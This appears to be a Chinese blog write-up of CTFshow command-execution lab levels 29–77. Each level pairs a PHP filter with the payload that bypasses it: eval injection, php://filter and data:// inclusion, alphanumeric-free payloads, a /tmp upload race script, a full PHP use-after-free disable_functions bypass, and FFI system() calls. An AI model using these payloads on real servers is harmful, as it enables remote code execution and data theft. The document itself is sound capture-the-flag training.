[CTFshow] web入门 命令执行29-77,118-122,124

已于 2024-09-13 11:45:53 修改
阅读量636 收藏 6
点赞数 15
分类专栏: CTF 文章标签: web安全 安全
于 2024-09-10 13:48:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46099552/article/details/142096898
版权

命令执行RCE

完结

web29

简单过滤

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

?c=system('tac fla*');

web30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

?c=passthru('tac fla*');

web31

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

尝试了使用 ${IFS} $IFS$9 < <> {,} 替换了空格字符,发现无效

  1. 学到了一种新的姿势,传入eval再生成一个get参数,新的参数不会被过滤

    ?c=eval($_GET[x]);&x=system("tac flag.php");

web32


error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

又学到新姿势

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

include$_GET[1]?> , ?> 充当;结束符, PHP 在遇到关闭标签 ?> 时,会自动认为这是语句的结束,即使没有明确的分号

web33

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

和上一题一模一样

web34

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

和上一题一模一样

web35

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

通杀

web36


error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这次过滤了数字,把$_GET的参数改一下就行

?c=include$_GET[x]?>&x=php://filter/read=convert.base64-encode/resource=flag.php

web37

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;    
    }        
}else{
    highlight_file(__FILE__);
}

伪协议中的data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行
?c=data://text/plain,<?php system('tac f*'); ?>

web38

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;    
    }        
}else{
    highlight_file(__FILE__);
}

尝试了上一题的做法发现不回显,但又不知道哪里被过滤了,这题直接base64编码即可

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTsgPz4=

web39

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }        
}else{
    highlight_file(__FILE__);
}

强加后缀,测试之前的做法

?c=data://text/plain,<?=phpinfo()?> 成功执行,所以无影响

?c=data://text/plain,<?=system('tac f*')?> 获取flag

web40


if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

过滤的其实是中文的括号

?c=phpinfo(); phpinfo里面没东西

只能用括号,应该是无参RCE了

参考:https://blog.csdn.net/qq_38154820/article/details/107171940

  1. 读取当前目录,localeconv()返回一包含本地数字及货币格式信息的数组。而数组第一项就是"."pos()返回数组中的单元,默认取第一个值

    ?c=print_r(scandir(pos(localeconv())));
// Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

    发现flag在倒数第二个

  2. 反转数组,把flag弄到第二个,array_reverse() 以相反的元素顺序返回数组

    ?c=print_r(array_reverse(scandir(pos(localeconv()))));
// Array ( [0] => index.php [1] => flag.php [2] => .. [3] => . )

  3. 获取 flag.php的字符串,next() 将数组中的内部指针向前移动一位

    ?c=print_r(next(array_reverse(scandir(pos(localeconv())))));
// flag.php

  4. 读取flag.php,使用readfile等常规读取文件函数不回显,使用show_source ,高亮显示文件回显文件内容

    ?c=print_r(show_source(next(array_reverse(scandir(pos(localeconv()))))));

web41

if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

又他🐎是新东西,无数字字母RCE,取反、异或、自增、临时文件

^字符被过滤了所以是用不了异或,|没有被过滤,则使用或运算

  1. 使用脚本先运行rec_or.php 生成 rec_or.txt后挨个找来构造

    <?php
$myfile = fopen("rce_or.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) { 
	for ($j=0; $j <256 ; $j++) { 
		if($i<16){
			$hex_i='0'.dechex($i);
		}
		else{
			$hex_i=dechex($i);
		}
		if($j<16){
			$hex_j='0'.dechex($j);
		}
		else{
			$hex_j=dechex($j);
		}
		$preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
		if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
					echo "";
    }
		else{
		$a='%'.$hex_i;
		$b='%'.$hex_j;
		$c=(urldecode($a)|urldecode($b));
		if (ord($c)>=32&ord($c)<=126) {
			$contents=$contents.$c." ".$a." ".$b."\n";
		}
	}
}
}
fwrite($myfile,$contents);
fclose($myfile);

  2. 构造payload

    system('ls')(system)('ls')是一样的都可以执行

    要使用或运算构造字符串时应将所有如刚才提到的未知字符1拼接到一起|未知字符2拼接到一起

    system=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60") 其中%13|%60=s %19|%60=y %14|%60=t

    # **payload** 
("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%07%00%10%08%10"|"%60%60%60%20%60%60%60%60%2e%60%60%60")

    注意不要使用hackbar来提交,会再进行一次url编码,使用bp提交

    POST / HTTP/1.1
Host: 
.....
c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%07%00%10%08%10"|"%60%60%60%20%60%60%60%60%2e%60%60%60")

  3. 提交后即可得到flag

web42


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

>/dev/null 2>&1 该条shell命令将不会输出任何信息到控制台,也不会有任何信息输出到文件中

使用 || 来绕过,逻辑或(OR)操作,如果第一个命令执行失败(返回非 0 状态码),则执行第二个命令。如果第一个命令成功执行(返回 0 状态码),则不会执行第二个命令。

?c=ls||  // 等于 ls || >/dev/null 2>&1 左边执行成功就不会执行右边的
?c=tac flag.php||

web43


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

增加了正则 /\;|cat/i ,但不影响和上一题一模一样

?c=ls||
?c=tac flag.php||

web44

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

正则绕过

?c=tac f*||

web45

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

正则匹配空格,${IFS} ,$IFS$9,<,<> 代替

?c=tac${IFS}fl*||

web46

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了*$ ,使用字符串拼接,使用"" or '' 来拼接

ls||
?c=tac<'fl''ag.php'||

web47

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上一题一样的payload

?c=tac<'fl''ag.php'||

web48

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上一题一样的payload

c=tac<'fl''ag.php'||

web49

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上一题一样的payload

?c=tac<'fl''ag.php'||

web50

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上一题一样的payload

?c=tac<'fl''ag.php'||

web51

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

不影响payload,修改一下即可

?c=t'a'c<'fl''ag.php'||

web52

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

>< 被过滤了,不过$被放出来了,使用${IFS}

# 发现flag不在当前目录下
?c=t'a'c${IFS}'fl''ag.php'||
# 寻找
## 再根目录下找到flag文件,查看,取得flag
?c=ls${IFS}/||
?c=t'a'c${IFS}/'fl'ag||

web53

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);   //会显示payload,输入ls的话看到的文件会混淆
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

还是一样

?c=t"a"c${IFS}"fl"ag.php

web54


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

.*c.*a.*t.*: 匹配任何包含 “cat” 的命令或字符串。.* 表示任意字符,所以不论是否有间隔,都会检测出 cat
? 没有被过滤,在Linux中可以替换单个字符,有个**** flag在f12注释掉了

?c=ls //flag.php index.php 
# 解法1
?c=uniq${IFS}f???????
# 解法2
?c=/bin/ca?${IFS}f???????
# 解法3
?c=mv${IFS}f???????${IFS}a.txt
?c=uniq${IFS}a.txt

web55

// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

把字母ban了,因为操作的bash,所以使用无字母bashshell操作

?c=$'\154\163' // ls
?c=$'\143\141\164'%20$'\146\154\141\147\56\160\150\160' //cat flag.php

另一种做法

?c=/???/????64 ????.???
// /bin/base64 flag.php

web56

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

过滤了数字字母,$ 也被过滤了,使用临时文件上传

p神的文章:https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

大致思路就是,上传php文件后会临时保存到/tmp/phpxxxxxx命名

然后我们通过 ?c=. /tmp/phpxxxxxx 去访问临时文件, /tmp/phpxxxxxx 里面是cat flag.php 之类的代码

脚本文件:

# -*- coding: utf-8 -*-
import requests

url = input("请输入URL:") // ctfshow....
catFlag = input("你想执行的命令:") //cat flag.php
flag = input("你想页面回显中有什么?") //flag
if "https" in url:
    url = url.replace("https", "http") // 替换flag为flag
add = "?c=.+/???/????????[@-[]" //这个就是匹配. /tmp/phpxxxxxx
while True:
    req = requests.post(url+add,files={"file": ("1.txt",catFlag)}) //上传文件,上传之后会存储在临时文件夹/tmp并以phpxxxxxx命名
    if flag in req.text: // 假如回显结果存在 flag
        print(req.text) // 输出页面内容
        break

web57

// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

使用$(())构造

通过$(())操作构造出36: $(()) :代表做一次运算,因为里面为空,也表示值为0

$(( ~$(()) )) :对0作取反运算,值为-1

$(( $((~$(()))) $((~$(()))) )): -1-1,也就是(-1)+(-1)为-2,所以值为-2

$(( ~$(( $((~$(()))) $((~$(()))) )) )) :再对-2做一次取反得到1,所以值为1

故我们在$(( ~$(( )) ))里面放37个$((~$(()))),得到-37,取反即可得到36:

来自 By j4m13d 师傅

payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

web58

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

POST,尝试system() ,显示被禁用,尝试readfile 获得flag

c=readfile('flag.php');

web59

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

readfile被禁用

c=show_source('flag.php');

web60

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
} 

c=show_source('flag.php');

web61

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
} 

#1
c=show_source('flag.php');
#2
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
#3

web62

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
} 

#1
c=show_source('flag.php');
#2
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web63


// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
} 

#1
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
#2
c=show_source('flag.php');

web64

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
    }

#1
c=show_source('flag.php');
#2
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web65

不是哥们?怎么一样的

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
    }

#1
c=show_source('flag.php');
#2
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web66

不一样了,把show_source给禁用了

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
    }

  1. 再尝试,发现flag不在这里

    
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

  2. 使用 scandir检查目录,发现flag.txt

    c=print_r(scandir('../../../'));
//Array ( [0] => . [1] => .. [2] => .dockerenv [3] => bin [4] => dev [5] => etc [6] => flag.txt [7] => home [8] => lib [9] => media [10] => mnt [11] => opt [12] => proc [13] => root [14] => run [15] => sbin [16] => srv [17] => sys [18] => tmp [19] => usr [20] => var )

  3. 在使用之前的命令来读取文件

    c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=../../../flag.txt

web67

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

尝试上一题的方法发现可以

c=print_r(scandir('../../../'));

c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=../../../flag.txt

web68

进门就是提示hightlight_file是用不了

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

尝试根据之前的源码来做

  1. 检查路径,发现flag.txt

    c=print_r(scandir('/')); # 被禁用
c=var_dump(scandir('/')); # 可执行

  2. 读取flag.txt

    c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=../../../flag.txt

web69

老样子进门就是提示hightlight_file是用不了

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

和上一题思路一样

  1. print_rvar_dump 都被禁用

    # 1 因为scandir输出的是数组
c=echo scandir('/')[6]; //一个一个尝试不过会耗时间
# 2
c=var_export(scandir('/')); // 更方便

  2. 读取文件

    #1
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=../../../flag.txt
#2
c=readgzfile('/flag.txt');

web70

进门提示:


Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14

Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 21
你要上天吗?

根据上面的源代码来做

c=var_export(scandir('/')); // 查看目录,发现flag.txt

// 读取文件
c=include$_POST[1]?>&1=php://filter/read=convert.base64-encode/resource=../../../flag.txt

web71

输出结果都变成了问号,没见过的,查看wp

提前送出缓冲区或终止程序

$s = ob_get_contents(); // 获取缓冲区
        ob_end_clean(); // 清楚缓冲区数据并输出
        echo preg_replace("/[0-9]|[a-z]/i","?",$s); //替换字符

在劫持输出缓冲区之前就把缓冲区送出,可以用的函数有:

ob_flush(); //缓冲区数据输出
ob_end_flush(); //清楚缓冲区数据并输出

payload示例:

c=include('/flag.txt');ob_flush();

使用 exit() die() 中止脚本也可以

web72

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

  1. 使用scandir发现只能查看本目录,上一级目录就不行了,看报错是open_basedir限制了

    c=var_export(scandir('../'));exit();
//scandir(): open_basedir restriction in effect. File(../) is not within the allowed path(s):

  2. 使用 DirectoryIterator+glob:// 来获取根目录文件

    c=$a = new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().'<br>');};exit();

    发现flag0.txt 文件

  3. 用之前的方法查看文件

    c=include('../../../flag0.txt');exit(); // 被 open basedir 限制

    使用uaf脚本,ctfshow提供的poc,使用url编码后提交上去即可

    <?php
function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();
?>

web73

没有提供源代码,尝试按照之前的源码来做

  1. 尝试scandir等操作

    c=var_export(scandir('/'));exit();
// 回显成功 ,发现 flagc.txt
// array ( 0 => '.', 1 => '..', 2 => '.dockerenv', 3 => 'bin', 4 => 'dev', 5 => 'etc', 6 => 'flagc.txt', 7 => 'home', 8 => 'lib', 9 => 'media', 10 => 'mnt', 11 => 'opt', 12 => 'proc', 13 => 'root', 14 => 'run', 15 => 'sbin', 16 => 'srv', 17 => 'sys', 18 => 'tmp', 19 => 'usr', 20 => 'var', )
// 尝试读取
c=include('/flagc.txt');exit();
// 获得flag 意外的正常

web74

没有提供源代码,尝试按照之前的源码来做

c=var_export(scandir('/'));exit(); //回显NULL
// 尝试其他的读取目录方法
c=$arrFiles = array();$handle = opendir('/');if ($handle) {while (($entry = readdir($handle)) !== FALSE) {$arrFiles[]=$entry;}}closedir($handle);var_export($arrFiles);exit();
// 读取成功,发现flagx.txt
// array ( 0 => 'srv', 1 => 'usr', 2 => 'root', 3 => 'media', 4 => '..', 5 => 'lib', 6 => 'sys', 7 => 'var', 8 => 'opt', 9 => 'proc', 10 => 'home', 11 => 'bin', 12 => 'dev', 13 => 'mnt', 14 => 'run', 15 => 'sbin', 16 => 'tmp', 17 => 'etc', 18 => '.', 19 => 'flagx.txt', 20 => '.dockerenv', )
// 读取
c=include('/flagx.txt');exit();

web75

没有提供源代码,尝试按照之前的源码来做

  1. 尝试上一题获取目录的方法,发现这次设置了open_basedir,使用web72的方法

    c=$a = new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().'<br>');};exit();

    发现flag36.txt

  2. 读取文件,尝试了uaf的脚本,但是发现strlen被禁用了,所以使用不了,include也不行

    看了wp发现还可以使用mysqlload_file

    c=$con = mysqli_connect('127.0.0.1','root','root');$result = mysqli_query($con,"SELECT load_file('/flag36.txt')"); while ($row = mysqli_fetch_assoc($result)){var_export($row);};exit();

    获取到flag

web76

没有提供源代码,尝试按照之前的源码来做

  1. 尝试上一题获取目录的方法,发现这次设置了open_basedir,使用web72的方法

    c=$a = new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().'<br>');};exit();

    发现flag36d.txt

  2. 读取文件,尝试了uaf的脚本,但是发现strlen被禁用了,所以使用不了,include也不行

    再尝试上一题的payload

    c=$con = mysqli_connect('127.0.0.1','root','root');$result = mysqli_query($con,"SELECT load_file('/flag36.txt')"); while ($row = mysqli_fetch_assoc($result)){var_export($row);};exit();

    获取到flag

web77

没有提供源代码,尝试按照之前的源码来做

  1. 尝试上一题获取目录的方法,发现这次设置了open_basedir,使用web72的方法

    c=$a = new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().'<br>');};exit();

    发现flag36x.txt ,并看到readflag方法

  2. 读取文件,尝试了uaf的脚本,但是发现strlen被禁用了,所以使用不了,include也不行

    再尝试上一题的payload

    提示 mysqli_connect未定义 ,并且去掉exit不是替换成而是把数字字母给替换成了空格

    查看wp发现可以使用FFI拓展

    https://www.laruence.com/2020/03/11/5475.html

  3. 构造

    c=$ffi = FFI::cdef("int system(const char *command);"); 
$a='/readflag > /var/www/html/1.txt'; 
$ffi->system($a); 
exit();
    • FFI::cdef("int system(const char *command);"): 这行代码使用 FFI::cdef() 声明了 C 语言的 system() 函数,允许 PHP 调用该函数来执行系统命令。
